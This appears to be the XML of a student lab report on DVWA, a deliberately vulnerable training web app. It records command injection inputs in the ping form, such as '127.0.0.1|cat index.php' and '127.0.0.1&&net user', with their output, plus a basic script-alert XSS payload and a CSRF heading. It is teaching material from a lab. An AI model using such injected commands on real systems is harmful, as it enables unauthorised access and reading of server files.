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Step1: login dvwa website</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step2:  click command line injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Enter an IP address:  127.0.0.1; ls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>PING 127.0.0.1 (127.0.0.1): 56 data bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.080 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.090 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.051 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.039 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>--- 127.0.0.1 ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4 packets transmitted, 4 packets received, 0% packet loss</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>round-trip min/avg/max/stddev = 0.039/0.065/0.090/0.000 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>help</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>================================================================================</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ping a device</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Enter an IP address: 127.0.0.1|cat index.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Vulnerability: Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>\n";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>if( $vulnerabilityFile == 'impossible.php' )</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>$page[ 'body' ] .= "</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>" . tokenField();</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>$page[ 'body' ] .= "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>{$html}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="double" w:color="auto" w:sz="6" w:space="1"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ping a device </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="160" w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter an IP address: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>127.0.0.1;ls ../</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>PING 127.0.0.1 (127.0.0.1): 56 data bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.020 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.077 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.044 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.044 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>--- 127.0.0.1 ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4 packets transmitted, 4 packets received, 0% packet loss</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>round-trip min/avg/max/stddev = 0.020/0.046/0.077/0.000 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>brute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>captcha</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>csp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>csrf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>exec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sqli_blind</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>upload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>view_help.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>view_source.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>view_source_all.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>weak_id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>xss_d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>xss_r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="double" w:color="auto" w:sz="6" w:space="1"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>xss_s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ping a device</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Enter an IP address:: 127.0.0.1&amp;&amp;net user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>PING 127.0.0.1 (127.0.0.1): 56 data bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.044 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.048 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.093 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.089 ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>--- 127.0.0.1 ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4 packets transmitted, 4 packets received, 0% packet loss</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>round-trip min/avg/max/stddev = 0.044/0.069/0.093/0.023 ms</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="6" w:space="1"/>
          <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>What's your name? Hello</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Hello hello</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>What's your name? &lt;script&gt;alert(“hello”)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4885055" cy="13957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CSRF(Cross-Site Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5938520" cy="3790315"/>
            <wp:effectExtent l="0" t="0" r="508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Observation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 attacker were successfully implemented.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05995"/>
    <w:rsid w:val="002B37DF"/>
    <w:rsid w:val="003C6BA4"/>
    <w:rsid w:val="00705A05"/>
    <w:rsid w:val="008259C0"/>
    <w:rsid w:val="0098152E"/>
    <w:rsid w:val="009C0F01"/>
    <w:rsid w:val="00C766D3"/>
    <w:rsid w:val="00E22EBE"/>
    <w:rsid w:val="00F05995"/>
    <w:rsid w:val="72A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normal"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="273" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Times New Roman" w:cs="Arial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303</Words>
  <Characters>1731</Characters>
  <Lines>14</Lines>
  <Paragraphs>4</Paragraphs>
  <TotalTime>33</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2030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2022-09-02T05:19:00Z</dcterms:created>
  <dc:creator>STUDENT</dc:creator>
  <cp:lastModifiedBy>A Balaram</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-06T05:50:40Z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2A2F71CC58554F5A8AE4F8A2303BFB7B</vt:lpwstr>
  </property>
</Properties>
</file>